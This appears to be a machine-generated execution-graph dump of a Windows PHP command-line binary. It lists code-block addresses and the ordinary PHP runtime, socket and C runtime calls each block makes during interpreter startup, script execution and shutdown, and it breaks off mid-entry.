                                                execution_graph 14857 7ff7498c27b0 open_file_for_scanning 14858 7ff7498c27c7 php_get_highlight_struct zend_highlight 14857->14858 14880 7ff7498c23ef 14857->14880 14858->14880 14859 7ff7498c2415 zend_destroy_file_handle 14859->14880 14860 7ff7498c2427 php_request_shutdown 14860->14880 14861 7ff7498c2438 free 14861->14880 14862 7ff7498c2779 14865 7ff7498cbc30 8 API calls 14862->14865 14863 7ff7498c244c _getpid 14863->14862 14864 7ff7498c245b __acrt_iob_func 14863->14864 14866 7ff7498c1010 fprintf __stdio_common_vfprintf 14864->14866 14867 7ff7498c2f39 14865->14867 14868 7ff7498c2475 __acrt_iob_func fflush 14866->14868 14874 7ff7498c24c2 14868->14874 14869 7ff7498c250b virtual_cwd_activate virtual_fopen 14871 7ff7498c2526 php_printf 14869->14871 14872 7ff7498c253b zend_stream_init_fp virtual_realpath 14869->14872 14870 7ff7498c25c5 php_request_startup 14876 7ff7498c2651 php_output_write 14870->14876 14877 7ff7498c2699 zend_register_bool_constant 14870->14877 14871->14880 14873 7ff7498c2564 _strdup 14872->14873 14872->14874 14873->14874 14874->14869 14874->14870 14875 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 14874->14875 14875->14874 14876->14880 14879 7ff7498c273b zend_is_auto_global 14877->14879 14877->14880 14878 7ff7498c266f sapi_deactivate zend_ini_deactivate 14878->14880 14879->14862 14879->14880 14880->14859 14880->14860 14880->14861 14880->14862 14880->14863 14880->14878 14880->14879 14880->14880 12894 7ff7498c28d1 12895 7ff7498c28dd 12894->12895 12896 7ff7498c28f7 12894->12896 12895->12896 12900 7ff7498c28f1 _efree@ 12895->12900 12897 7ff7498c1900 9 API calls 12896->12897 12898 7ff7498c2900 12897->12898 12899 7ff7498c2909 zend_eval_string_ex 12898->12899 12910 7ff7498c291e 12898->12910 12899->12910 12900->12896 12901 7ff7498c2b12 12902 7ff7498c2b1f zend_eval_string_ex 12901->12902 12907 7ff7498c23ef 12901->12907 12902->12907 12903 7ff7498c2940 _php_stream_get_line 12903->12901 12903->12910 12904 7ff7498c2415 zend_destroy_file_handle 12904->12907 12905 7ff7498c2427 php_request_shutdown 12905->12907 12906 7ff7498c2999 _emalloc@ memmove zend_hash_str_update@ zend_hash_str_update@ 12906->12910 12911 7ff7498c2a5d zend_eval_string_ex 12906->12911 12907->12904 12907->12905 12908 7ff7498c2438 free 12907->12908 12909 7ff7498c244c _getpid 12907->12909 12930 7ff7498c266f sapi_deactivate zend_ini_deactivate 12907->12930 12931 7ff7498c273b zend_is_auto_global 12907->12931 12932 7ff7498c2779 12907->12932 12908->12907 12914 7ff7498c245b __acrt_iob_func 12909->12914 12909->12932 12910->12901 12910->12903 12910->12906 12912 7ff7498c2a79 virtual_fopen 12910->12912 12913 7ff7498c2aed _efree@ 12910->12913 12911->12913 12916 7ff7498c2ab9 zend_stream_init_fp php_execute_script 12912->12916 12917 7ff7498c2a8e php_printf 12912->12917 12913->12901 12913->12903 12918 7ff7498c1010 fprintf __stdio_common_vfprintf 12914->12918 12915 7ff7498cbc30 8 API calls 12919 7ff7498c2f39 12915->12919 12916->12913 12917->12913 12920 7ff7498c2475 __acrt_iob_func fflush 12918->12920 12921 7ff7498c24c2 12920->12921 12922 7ff7498c250b virtual_cwd_activate virtual_fopen 12921->12922 12923 7ff7498c25c5 php_request_startup 12921->12923 12927 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 12921->12927 12924 7ff7498c2526 php_printf 12922->12924 12925 7ff7498c253b zend_stream_init_fp virtual_realpath 12922->12925 12928 7ff7498c2651 php_output_write 12923->12928 12929 7ff7498c2699 zend_register_bool_constant 12923->12929 12924->12907 12925->12921 12926 7ff7498c2564 _strdup 12925->12926 12926->12921 12927->12921 12928->12907 12929->12907 12929->12931 12930->12907 12931->12907 12931->12932 12932->12915 15103 7ff7498c21cc zend_load_extension 15104 7ff7498c2275 php_getopt 15103->15104 15105 7ff7498c1d80 15104->15105 15106 7ff7498c22bc 15104->15106 15105->15104 15107 7ff7498c1d8c get_zend_version php_printf sapi_deactivate 15105->15107 15108 7ff7498c22e0 php_output_write 15106->15108 15109 7ff7498c231c 15106->15109 15141 7ff7498c23ef 15107->15141 15114 7ff7498c266f sapi_deactivate zend_ini_deactivate 15108->15114 15111 7ff7498c2321 php_win32_console_is_own 15109->15111 15113 7ff7498c232f 15109->15113 15111->15113 15116 7ff7498c23a8 15113->15116 15117 7ff7498c1060 printf 2 API calls 15113->15117 15114->15141 15115 7ff7498c2415 zend_destroy_file_handle 15115->15141 15118 7ff7498c23af __acrt_iob_func 15116->15118 15135 7ff7498c23e6 15116->15135 15120 7ff7498c2390 __acrt_iob_func fflush 15117->15120 15121 7ff7498c1010 fprintf __stdio_common_vfprintf 15118->15121 15119 7ff7498c2427 php_request_shutdown 15119->15141 15120->15116 15125 7ff7498c23c9 __acrt_iob_func fflush 15121->15125 15122 7ff7498c2438 free 15122->15141 15123 7ff7498c2779 15127 7ff7498cbc30 8 API calls 15123->15127 15124 7ff7498c244c _getpid 15124->15123 15126 7ff7498c245b __acrt_iob_func 15124->15126 15125->15135 15129 7ff7498c1010 fprintf __stdio_common_vfprintf 15126->15129 15131 7ff7498c2f39 15127->15131 15128 7ff7498c250b virtual_cwd_activate virtual_fopen 15132 7ff7498c2526 php_printf 15128->15132 15133 7ff7498c253b zend_stream_init_fp virtual_realpath 15128->15133 15136 7ff7498c2475 __acrt_iob_func fflush 15129->15136 15130 7ff7498c25c5 php_request_startup 15138 7ff7498c2651 php_output_write 15130->15138 15139 7ff7498c2699 zend_register_bool_constant 15130->15139 15132->15141 15134 7ff7498c2564 _strdup 15133->15134 15133->15135 15134->15135 15135->15128 15135->15130 15137 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 15135->15137 15136->15135 15137->15135 15138->15141 15140 7ff7498c273b zend_is_auto_global 15139->15140 15139->15141 15140->15123 15140->15141 15141->15114 15141->15115 15141->15119 15141->15122 15141->15123 15141->15124 15141->15140 15141->15141 15243 7ff7498c1fc2 15244 7ff7498c1d80 15243->15244 15245 7ff7498c2275 php_getopt 15244->15245 15246 7ff7498c1d8c get_zend_version php_printf sapi_deactivate 15244->15246 15245->15244 15247 7ff7498c22bc 15245->15247 15281 7ff7498c23ef 15246->15281 15248 7ff7498c22e0 php_output_write 15247->15248 15249 7ff7498c231c 15247->15249 15254 7ff7498c266f sapi_deactivate zend_ini_deactivate 15248->15254 15251 7ff7498c2321 php_win32_console_is_own 15249->15251 15253 7ff7498c232f 15249->15253 15251->15253 15256 7ff7498c23a8 15253->15256 15257 7ff7498c1060 printf 2 API calls 15253->15257 15254->15281 15255 7ff7498c2415 zend_destroy_file_handle 15255->15281 15258 7ff7498c23af __acrt_iob_func 15256->15258 15275 7ff7498c23e6 15256->15275 15260 7ff7498c2390 __acrt_iob_func fflush 15257->15260 15261 7ff7498c1010 fprintf __stdio_common_vfprintf 15258->15261 15259 7ff7498c2427 php_request_shutdown 15259->15281 15260->15256 15265 7ff7498c23c9 __acrt_iob_func fflush 15261->15265 15262 7ff7498c2438 free 15262->15281 15263 7ff7498c2779 15267 7ff7498cbc30 8 API calls 15263->15267 15264 7ff7498c244c _getpid 15264->15263 15266 7ff7498c245b __acrt_iob_func 15264->15266 15265->15275 15269 7ff7498c1010 fprintf __stdio_common_vfprintf 15266->15269 15271 7ff7498c2f39 15267->15271 15268 7ff7498c250b virtual_cwd_activate virtual_fopen 15272 7ff7498c2526 php_printf 15268->15272 15273 7ff7498c253b zend_stream_init_fp virtual_realpath 15268->15273 15276 7ff7498c2475 __acrt_iob_func fflush 15269->15276 15270 7ff7498c25c5 php_request_startup 15278 7ff7498c2651 php_output_write 15270->15278 15279 7ff7498c2699 zend_register_bool_constant 15270->15279 15272->15281 15274 7ff7498c2564 _strdup 15273->15274 15273->15275 15274->15275 15275->15268 15275->15270 15277 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 15275->15277 15276->15275 15277->15275 15278->15281 15280 7ff7498c273b zend_is_auto_global 15279->15280 15279->15281 15280->15263 15280->15281 15281->15254 15281->15255 15281->15259 15281->15262 15281->15263 15281->15264 15281->15280 15281->15281 12333 7ff7498cbfec 12334 7ff7498cc005 __scrt_initialize_crt 12333->12334 12335 7ff7498cc143 12334->12335 12336 7ff7498cc00d __scrt_acquire_startup_lock 12334->12336 12337 7ff7498cc4e4 9 API calls 12335->12337 12338 7ff7498cc14d 12336->12338 12344 7ff7498cc02b __scrt_release_startup_lock 12336->12344 12337->12338 12339 7ff7498cc4e4 9 API calls 12338->12339 12340 7ff7498cc158 12339->12340 12342 7ff7498cc160 _exit 12340->12342 12341 7ff7498cc050 12343 7ff7498cc0d6 _get_initial_narrow_environment __p___argv __p___argc 12353 7ff7498c3050 12343->12353 12344->12341 12344->12343 12347 7ff7498cc0ce _register_thread_local_exe_atexit_callback 12344->12347 12347->12343 12389 7ff7498cbb30 12353->12389 12355 7ff7498c30dc 14 API calls 12356 7ff7498c31ae php_getopt 12355->12356 12359 7ff7498c31e8 12355->12359 12357 7ff7498c32b3 sapi_startup 12356->12357 12356->12359 12358 7ff7498c3310 php_ini_builder_prepend 12357->12358 12361 7ff7498c3325 12357->12361 12358->12361 12359->12356 12360 7ff7498c3246 php_ini_builder_define 12359->12360 12360->12356 12362 7ff7498c3354 php_win32_cp_cli_do_setup php_win32_cp_get_orig GetCommandLineW CommandLineToArgvW malloc 12361->12362 12371 7ff7498c3347 12361->12371 12363 7ff7498c33e7 SetConsoleCtrlHandler 12362->12363 12364 7ff7498c33ac 12362->12364 12365 7ff7498c341d __intrinsic_setjmp 12363->12365 12366 7ff7498c340b 12363->12366 12364->12363 12369 7ff7498c33c0 php_win32_cp_conv_w_to_cur 12364->12369 12370 7ff7498c3462 12365->12370 12365->12371 12366->12365 12367 7ff7498c34d2 12511 7ff7498c10d0 free 12367->12511 12368 7ff7498c34c9 free 12368->12367 12369->12363 12369->12369 12373 7ff7498c3482 12370->12373 12374 7ff7498c3474 12370->12374 12371->12367 12371->12368 12441 7ff7498c97d0 12373->12441 12390 7ff7498c1b10 _getpid 12374->12390 12389->12355 12391 7ff7498c1c3a 12390->12391 12392 7ff7498c1c47 php_getopt 12391->12392 12440 7ff7498c23ef 12391->12440 12393 7ff7498c1c95 12392->12393 12394 7ff7498c1ce3 php_getopt 12392->12394 12396 7ff7498c1f40 php_request_startup 12393->12396 12402 7ff7498c1dfb php_request_startup 12393->12402 12408 7ff7498c1cb0 php_getopt 12393->12408 12409 7ff7498c1dab get_zend_version php_printf sapi_deactivate 12393->12409 12397 7ff7498c22bc 12394->12397 12398 7ff7498c1d5e 12394->12398 12395 7ff7498c2415 zend_destroy_file_handle 12395->12440 12399 7ff7498c266f sapi_deactivate zend_ini_deactivate 12396->12399 12400 7ff7498c1f4f php_print_info php_output_end_all 12396->12400 12403 7ff7498c22e0 php_output_write 12397->12403 12404 7ff7498c231c 12397->12404 12405 7ff7498c2275 php_getopt 12398->12405 12406 7ff7498c1d8c 12398->12406 12399->12440 12400->12440 12401 7ff7498c2427 php_request_shutdown 12401->12440 12402->12399 12407 7ff7498c1e0a php_printf _zend_hash_init@ zend_hash_copy@ zend_hash_sort_ex@ 12402->12407 12403->12399 12413 7ff7498c2321 php_win32_console_is_own 12404->12413 12418 7ff7498c232f 12404->12418 12405->12397 12405->12398 12406->12409 12414 7ff7498c1e84 12407->12414 12415 7ff7498c1ea7 8 API calls 12407->12415 12408->12393 12408->12394 12409->12440 12410 7ff7498c2438 free 12410->12440 12411 7ff7498c2779 12518 7ff7498cbc30 12411->12518 12412 7ff7498c244c _getpid 12412->12411 12416 7ff7498c245b __acrt_iob_func 12412->12416 12413->12418 12414->12415 12420 7ff7498c1e8a php_printf 12414->12420 12415->12440 12421 7ff7498c1010 fprintf __stdio_common_vfprintf 12416->12421 12423 7ff7498c23a8 12418->12423 12512 7ff7498c1060 __acrt_iob_func 12418->12512 12420->12414 12425 7ff7498c2475 __acrt_iob_func fflush 12421->12425 12426 7ff7498c23af __acrt_iob_func 12423->12426 12435 7ff7498c23e6 12423->12435 12425->12435 12515 7ff7498c1010 12426->12515 12427 7ff7498c2390 __acrt_iob_func fflush 12427->12423 12429 7ff7498c23c9 __acrt_iob_func fflush 12429->12435 12430 7ff7498c250b virtual_cwd_activate virtual_fopen 12432 7ff7498c2526 php_printf 12430->12432 12433 7ff7498c253b zend_stream_init_fp virtual_realpath 12430->12433 12431 7ff7498c25c5 php_request_startup 12437 7ff7498c2651 php_output_write 12431->12437 12438 7ff7498c2699 zend_register_bool_constant 12431->12438 12432->12440 12434 7ff7498c2564 _strdup 12433->12434 12433->12435 12434->12435 12435->12430 12435->12431 12436 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 12435->12436 12436->12435 12437->12440 12439 7ff7498c273b zend_is_auto_global 12438->12439 12438->12440 12439->12411 12439->12440 12440->12395 12440->12399 12440->12401 12440->12410 12440->12411 12440->12412 12440->12439 12440->12440 12534 7ff7498cca60 12441->12534 12444 7ff7498c9c3a virtual_getcwd 12499 7ff7498c9c31 12444->12499 12445 7ff7498c98d5 php_getopt 12446 7ff7498c990c 12445->12446 12448 7ff7498c9854 12445->12448 12446->12444 12449 7ff7498c9915 php_win32_cp_use_unicode 12446->12449 12448->12445 12456 7ff7498c9998 __acrt_iob_func 12448->12456 12457 7ff7498c988a memmove 12448->12457 12467 7ff7498c9eae 12448->12467 12451 7ff7498c9942 php_win32_cp_conv_ascii_to_w 12449->12451 12452 7ff7498c99bc php_win32_cp_conv_cur_to_w 12449->12452 12454 7ff7498c9950 php_win32_cp_conv_utf8_to_w 12451->12454 12458 7ff7498c99c2 12451->12458 12452->12458 12453 7ff7498c9c90 strchr 12572 7ff7498c6030 12453->12572 12454->12458 12459 7ff7498c9968 GetACP php_win32_cp_get_by_id 12454->12459 12461 7ff7498c1010 fprintf __stdio_common_vfprintf 12456->12461 12457->12448 12462 7ff7498c9a24 php_win32_code_to_errno SetLastError _set_errno 12458->12462 12468 7ff7498c99e0 malloc 12458->12468 12469 7ff7498c9baa 12458->12469 12459->12458 12465 7ff7498c997b php_win32_cp_conv_to_w 12459->12465 12482 7ff7498c99b2 12461->12482 12464 7ff7498c9a44 __acrt_iob_func 12462->12464 12463 7ff7498cbc30 8 API calls 12470 7ff7498c3487 12463->12470 12472 7ff7498c1010 fprintf __stdio_common_vfprintf 12464->12472 12465->12458 12466 7ff7498c9e1f zend_hash_destroy@ zend_hash_destroy@ 12473 7ff7498c9e46 closesocket 12466->12473 12474 7ff7498c9e4c 12466->12474 12584 7ff7498cbd64 12467->12584 12477 7ff7498c99f6 php_win32_ioutil_normalize_path_w 12468->12477 12478 7ff7498c9a19 free 12468->12478 12469->12462 12475 7ff7498c9bc5 php_win32_ioutil_stat_ex_w free 12469->12475 12470->12371 12472->12482 12473->12474 12483 7ff7498c9e5e 12474->12483 12484 7ff7498c9e58 free 12474->12484 12475->12464 12485 7ff7498c9be8 12475->12485 12476 7ff7498c9d40 memmove memmove php_select 12498 7ff7498c9d24 12476->12498 12479 7ff7498c9a10 free 12477->12479 12480 7ff7498c9a6b 12477->12480 12478->12462 12479->12478 12486 7ff7498c9a90 12480->12486 12487 7ff7498c9a7a realloc 12480->12487 12482->12463 12488 7ff7498c9e70 12483->12488 12489 7ff7498c9e6a free 12483->12489 12484->12483 12490 7ff7498c9bf7 __acrt_iob_func 12485->12490 12491 7ff7498c9c1a virtual_realpath 12485->12491 12494 7ff7498c9aa3 wcsncmp 12486->12494 12495 7ff7498c9ae6 12486->12495 12487->12479 12487->12486 12488->12482 12497 7ff7498c9e7c free 12488->12497 12489->12488 12496 7ff7498c1010 fprintf __stdio_common_vfprintf 12490->12496 12491->12499 12493 7ff7498c9dcd WSAGetLastError 12493->12498 12500 7ff7498c9de9 12493->12500 12503 7ff7498c9abf 12494->12503 12504 7ff7498c9b0d memmove 12494->12504 12505 7ff7498c9b2f 12495->12505 12506 7ff7498c9af1 wcsncmp 12495->12506 12496->12482 12497->12482 12498->12476 12498->12493 12501 7ff7498c9de7 12498->12501 12578 7ff7498c5ba0 12498->12578 12536 7ff7498c8c70 12499->12536 12500->12466 12502 7ff7498c9df2 php_socket_strerror 12500->12502 12501->12466 12508 7ff7498c6030 18 API calls 12502->12508 12503->12495 12509 7ff7498c9aca wcsncmp 12503->12509 12507 7ff7498c9b9a free 12504->12507 12505->12507 12506->12504 12506->12505 12507->12469 12510 7ff7498c9e16 _efree@ 12508->12510 12509->12495 12509->12504 12510->12466 12527 7ff7498c1000 12512->12527 12514 7ff7498c1096 __stdio_common_vfprintf 12514->12427 12528 7ff7498c1000 12515->12528 12517 7ff7498c1036 __stdio_common_vfprintf 12517->12429 12519 7ff7498cbc39 12518->12519 12520 7ff7498c2f39 12519->12520 12521 7ff7498cbc90 IsProcessorFeaturePresent 12519->12521 12520->12371 12522 7ff7498cbca8 12521->12522 12529 7ff7498cbe84 RtlCaptureContext 12522->12529 12527->12514 12528->12517 12530 7ff7498cbe9e RtlLookupFunctionEntry 12529->12530 12531 7ff7498cbeb4 RtlVirtualUnwind 12530->12531 12532 7ff7498cbcbb 12530->12532 12531->12530 12531->12532 12533 7ff7498cbc50 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12532->12533 12535 7ff7498c97f2 php_getopt 12534->12535 12535->12444 12535->12448 12537 7ff7498c8ca0 strchr 12536->12537 12538 7ff7498c8d0d strchr 12536->12538 12539 7ff7498c8cbe 12537->12539 12540 7ff7498c8fda __acrt_iob_func 12537->12540 12538->12540 12541 7ff7498c8d27 strtol 12538->12541 12539->12540 12543 7ff7498c8cd0 strtol 12539->12543 12542 7ff7498c1010 fprintf __stdio_common_vfprintf 12540->12542 12546 7ff7498c8cf0 12541->12546 12544 7ff7498c8fcc 12542->12544 12543->12546 12544->12453 12544->12482 12545 7ff7498c8d66 zend_strndup@ 12545->12540 12547 7ff7498c8d82 12545->12547 12546->12540 12546->12545 12587 7ff7498c60a0 php_network_getaddresses 12547->12587 12550 7ff7498c8db8 12560 7ff7498c6030 18 API calls 12550->12560 12551 7ff7498c8e19 php_set_sock_blocking 12552 7ff7498c8e47 getenv 12551->12552 12553 7ff7498c8e28 12551->12553 12555 7ff7498c8e76 _zend_hash_init@ 12552->12555 12556 7ff7498c8e5c __acrt_iob_func 12552->12556 12554 7ff7498c6030 18 API calls 12553->12554 12557 7ff7498c8e39 free 12554->12557 12561 7ff7498c8ef0 12555->12561 12558 7ff7498c1010 fprintf __stdio_common_vfprintf 12556->12558 12557->12544 12558->12555 12562 7ff7498c8df0 12560->12562 12561->12561 12563 7ff7498c8efa zend_strndup@ 12561->12563 12564 7ff7498c8e0b free 12562->12564 12567 7ff7498c8e05 _efree@ 12562->12567 12565 7ff7498c8f3f 12563->12565 12566 7ff7498c8f19 zend_strndup@ 12563->12566 12564->12544 12568 7ff7498c8f4c _zend_hash_init@ 12565->12568 12566->12568 12567->12564 12568->12544 12569 7ff7498c8f7b zend_hash_str_add@ 12568->12569 12569->12544 12573 7ff7498c6057 zend_vspprintf 12572->12573 12574 7ff7498c608e signal 12572->12574 12573->12574 12575 7ff7498c6074 12573->12575 12574->12466 12574->12498 12613 7ff7498c59a0 12575->12613 12580 7ff7498c5bb2 12578->12580 12579 7ff7498c5cae 12581 7ff7498cbc30 8 API calls 12579->12581 12580->12579 12623 7ff7498c9470 12580->12623 12583 7ff7498c5cc8 12581->12583 12583->12498 12642 7ff7498cbd78 IsProcessorFeaturePresent 12584->12642 12588 7ff7498c62b6 12587->12588 12595 7ff7498c60e8 12587->12595 12588->12550 12588->12551 12589 7ff7498c6280 php_network_freeaddresses 12590 7ff7498c6289 12589->12590 12590->12588 12593 7ff7498c62a5 12590->12593 12594 7ff7498c629c closesocket 12590->12594 12591 7ff7498c6118 socket 12591->12595 12592 7ff7498c610d free 12592->12591 12593->12588 12597 7ff7498c62aa php_socket_error_str 12593->12597 12594->12593 12595->12591 12595->12592 12596 7ff7498c619b __zend_malloc htons 12595->12596 12598 7ff7498c6243 12595->12598 12599 7ff7498c615f __zend_malloc htons 12595->12599 12600 7ff7498c614a closesocket 12595->12600 12602 7ff7498c6263 12595->12602 12607 7ff7498c6276 12595->12607 12610 7ff7498c6225 closesocket 12595->12610 12601 7ff7498c61c5 setsockopt bind 12596->12601 12597->12588 12598->12602 12603 7ff7498c6249 listen 12598->12603 12599->12601 12600->12595 12604 7ff7498c62d2 12601->12604 12605 7ff7498c620f WSAGetLastError 12601->12605 12602->12607 12608 7ff7498c626d free 12602->12608 12603->12602 12606 7ff7498c625b WSAGetLastError 12603->12606 12604->12603 12609 7ff7498c62e4 getsockname 12604->12609 12605->12595 12605->12602 12606->12602 12607->12589 12607->12590 12608->12607 12609->12606 12611 7ff7498c62fb 12609->12611 12610->12595 12611->12603 12612 7ff7498c630e htons 12611->12612 12612->12603 12614 7ff7498c5a80 12613->12614 12615 7ff7498c59c4 _ftime64 _ctime64_s 12613->12615 12617 7ff7498cbc30 8 API calls 12614->12617 12616 7ff7498c59e8 __acrt_iob_func 12615->12616 12622 7ff7498c5a25 12615->12622 12620 7ff7498c1010 fprintf __stdio_common_vfprintf 12616->12620 12619 7ff7498c5a8d _efree@ 12617->12619 12619->12574 12620->12614 12621 7ff7498cbd64 8 API calls 12621->12622 12622->12613 12622->12616 12622->12621 12624 7ff7498c975b zend_hash_index_find@ 12623->12624 12625 7ff7498c948e __zend_malloc accept 12623->12625 12641 7ff7498c9717 12624->12641 12626 7ff7498c951f php_set_sock_blocking 12625->12626 12627 7ff7498c94bf WSAGetLastError 12625->12627 12628 7ff7498c954e __zend_malloc php_network_populate_name_from_sockaddr 12626->12628 12629 7ff7498c952e free closesocket 12626->12629 12630 7ff7498c94cc 12627->12630 12631 7ff7498c9508 free 12627->12631 12632 7ff7498c95ab __zend_malloc memmove 12628->12632 12634 7ff7498c95a6 12628->12634 12629->12580 12630->12631 12633 7ff7498c94d5 WSAGetLastError php_socket_strerror 12630->12633 12631->12580 12632->12634 12635 7ff7498c6030 18 API calls 12633->12635 12636 7ff7498c9610 _zend_hash_init@ _zend_hash_init@ 12634->12636 12638 7ff7498c9607 _efree@ 12634->12638 12637 7ff7498c94ff _efree@ 12635->12637 12639 7ff7498c6030 18 API calls 12636->12639 12637->12631 12638->12636 12640 7ff7498c96e1 zend_hash_index_update@ 12639->12640 12640->12641 12641->12580 12643 7ff7498cbd8f 12642->12643 12648 7ff7498cbe14 RtlCaptureContext RtlLookupFunctionEntry 12643->12648 12649 7ff7498cbe44 RtlVirtualUnwind 12648->12649 12650 7ff7498cbda3 12648->12650 12649->12650 12651 7ff7498cbc50 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12650->12651 12288 7ff7498c27e6 12289 7ff7498c27eb 12288->12289 12292 7ff7498c27f0 php_execute_script 12288->12292 12293 7ff7498c1900 _php_stream_open_wrapper_ex _php_stream_open_wrapper_ex _php_stream_open_wrapper_ex 12289->12293 12294 7ff7498c1984 12293->12294 12295 7ff7498c1aaa 12294->12295 12296 7ff7498c1a9c _php_stream_free 12294->12296 12299 7ff7498c19be zend_register_constant 12294->12299 12297 7ff7498c1aaf _php_stream_free 12295->12297 12298 7ff7498c1abd 12295->12298 12296->12295 12297->12298 12300 7ff7498c1ac2 _php_stream_free 12298->12300 12301 7ff7498c1ad0 12298->12301 12303 7ff7498c1a58 zend_register_constant 12299->12303 12300->12301 12301->12292 12304 7ff7498c1a8a zend_register_constant 12303->12304 12304->12301 15423 7ff7498c21e6 15424 7ff7498c2275 php_getopt 15423->15424 15425 7ff7498c1d80 15424->15425 15426 7ff7498c22bc 15424->15426 15425->15424 15427 7ff7498c1d8c get_zend_version php_printf sapi_deactivate 15425->15427 15428 7ff7498c22e0 php_output_write 15426->15428 15429 7ff7498c231c 15426->15429 15461 7ff7498c23ef 15427->15461 15434 7ff7498c266f sapi_deactivate zend_ini_deactivate 15428->15434 15431 7ff7498c2321 php_win32_console_is_own 15429->15431 15433 7ff7498c232f 15429->15433 15431->15433 15436 7ff7498c23a8 15433->15436 15437 7ff7498c1060 printf 2 API calls 15433->15437 15434->15461 15435 7ff7498c2415 zend_destroy_file_handle 15435->15461 15438 7ff7498c23af __acrt_iob_func 15436->15438 15455 7ff7498c23e6 15436->15455 15440 7ff7498c2390 __acrt_iob_func fflush 15437->15440 15441 7ff7498c1010 fprintf __stdio_common_vfprintf 15438->15441 15439 7ff7498c2427 php_request_shutdown 15439->15461 15440->15436 15445 7ff7498c23c9 __acrt_iob_func fflush 15441->15445 15442 7ff7498c2438 free 15442->15461 15443 7ff7498c2779 15447 7ff7498cbc30 8 API calls 15443->15447 15444 7ff7498c244c _getpid 15444->15443 15446 7ff7498c245b __acrt_iob_func 15444->15446 15445->15455 15449 7ff7498c1010 fprintf __stdio_common_vfprintf 15446->15449 15451 7ff7498c2f39 15447->15451 15448 7ff7498c250b virtual_cwd_activate virtual_fopen 15452 7ff7498c2526 php_printf 15448->15452 15453 7ff7498c253b zend_stream_init_fp virtual_realpath 15448->15453 15456 7ff7498c2475 __acrt_iob_func fflush 15449->15456 15450 7ff7498c25c5 php_request_startup 15458 7ff7498c2651 php_output_write 15450->15458 15459 7ff7498c2699 zend_register_bool_constant 15450->15459 15452->15461 15454 7ff7498c2564 _strdup 15453->15454 15453->15455 15454->15455 15455->15448 15455->15450 15457 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 15455->15457 15456->15455 15457->15455 15458->15461 15460 7ff7498c273b zend_is_auto_global 15459->15460 15459->15461 15460->15443 15460->15461 15461->15434 15461->15435 15461->15439 15461->15442 15461->15443 15461->15444 15461->15460 15461->15461 15527 7ff7498c21dc 15528 7ff7498c2275 php_getopt 15527->15528 15529 7ff7498c1d80 15528->15529 15530 7ff7498c22bc 15528->15530 15529->15528 15531 7ff7498c1d8c get_zend_version php_printf sapi_deactivate 15529->15531 15532 7ff7498c22e0 php_output_write 15530->15532 15533 7ff7498c231c 15530->15533 15546 7ff7498c23ef 15531->15546 15538 7ff7498c266f sapi_deactivate zend_ini_deactivate 15532->15538 15535 7ff7498c2321 php_win32_console_is_own 15533->15535 15536 7ff7498c232f 15533->15536 15535->15536 15540 7ff7498c23a8 15536->15540 15541 7ff7498c1060 printf 2 API calls 15536->15541 15538->15546 15539 7ff7498c2415 zend_destroy_file_handle 15539->15546 15542 7ff7498c23af __acrt_iob_func 15540->15542 15559 7ff7498c23e6 15540->15559 15544 7ff7498c2390 __acrt_iob_func fflush 15541->15544 15545 7ff7498c1010 fprintf __stdio_common_vfprintf 15542->15545 15543 7ff7498c2427 php_request_shutdown 15543->15546 15544->15540 15549 7ff7498c23c9 __acrt_iob_func fflush 15545->15549 15546->15538 15546->15539 15546->15543 15547 7ff7498c2438 free 15546->15547 15548 7ff7498c244c _getpid 15546->15548 15564 7ff7498c273b zend_is_auto_global 15546->15564 15565 7ff7498c2779 15546->15565 15547->15546 15550 7ff7498c245b __acrt_iob_func 15548->15550 15548->15565 15549->15559 15553 7ff7498c1010 fprintf __stdio_common_vfprintf 15550->15553 15551 7ff7498cbc30 8 API calls 15555 7ff7498c2f39 15551->15555 15552 7ff7498c250b virtual_cwd_activate virtual_fopen 15556 7ff7498c2526 php_printf 15552->15556 15557 7ff7498c253b zend_stream_init_fp virtual_realpath 15552->15557 15560 7ff7498c2475 __acrt_iob_func fflush 15553->15560 15554 7ff7498c25c5 php_request_startup 15562 7ff7498c2651 php_output_write 15554->15562 15563 7ff7498c2699 zend_register_bool_constant 15554->15563 15556->15546 15558 7ff7498c2564 _strdup 15557->15558 15557->15559 15558->15559 15559->15552 15559->15554 15561 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 15559->15561 15560->15559 15561->15559 15562->15546 15563->15546 15563->15564 15564->15546 15564->15565 15565->15551 15723 7ff7498c200b 15725 7ff7498c1d80 15723->15725 15724 7ff7498c2275 php_getopt 15724->15725 15726 7ff7498c22bc 15724->15726 15725->15724 15727 7ff7498c1d8c get_zend_version php_printf sapi_deactivate 15725->15727 15728 7ff7498c22e0 php_output_write 15726->15728 15729 7ff7498c231c 15726->15729 15743 7ff7498c23ef 15727->15743 15734 7ff7498c266f sapi_deactivate zend_ini_deactivate 15728->15734 15731 7ff7498c2321 php_win32_console_is_own 15729->15731 15733 7ff7498c232f 15729->15733 15731->15733 15736 7ff7498c23a8 15733->15736 15737 7ff7498c1060 printf 2 API calls 15733->15737 15734->15743 15735 7ff7498c2415 zend_destroy_file_handle 15735->15743 15738 7ff7498c23af __acrt_iob_func 15736->15738 15739 7ff7498c23e6 15736->15739 15741 7ff7498c2390 __acrt_iob_func fflush 15737->15741 15742 7ff7498c1010 fprintf __stdio_common_vfprintf 15738->15742 15749 7ff7498c250b virtual_cwd_activate virtual_fopen 15739->15749 15751 7ff7498c25c5 php_request_startup 15739->15751 15757 7ff7498c25a1 __acrt_iob_func zend_stream_init_fp 15739->15757 15740 7ff7498c2427 php_request_shutdown 15740->15743 15741->15736 15746 7ff7498c23c9 __acrt_iob_func fflush 15742->15746 15743->15734 15743->15735 15743->15740 15744 7ff7498c2438 free 15743->15744 15745 7ff7498c244c _getpid 15743->15745 15760 7ff7498c273b zend_is_auto_global 15743->15760 15761 7ff7498c2779 15743->15761 15744->15743 15747 7ff7498c245b __acrt_iob_func 15745->15747 15745->15761 15746->15739 15750 7ff7498c1010 fprintf __stdio_common_vfprintf 15747->15750 15748 7ff7498cbc30 8 API calls 15752 7ff7498c2f39 15748->15752 15753 7ff7498c2526 php_printf 15749->15753 15754 7ff7498c253b zend_stream_init_fp virtual_realpath 15749->15754 15756 7ff7498c2475 __acrt_iob_func fflush 15750->15756 15758 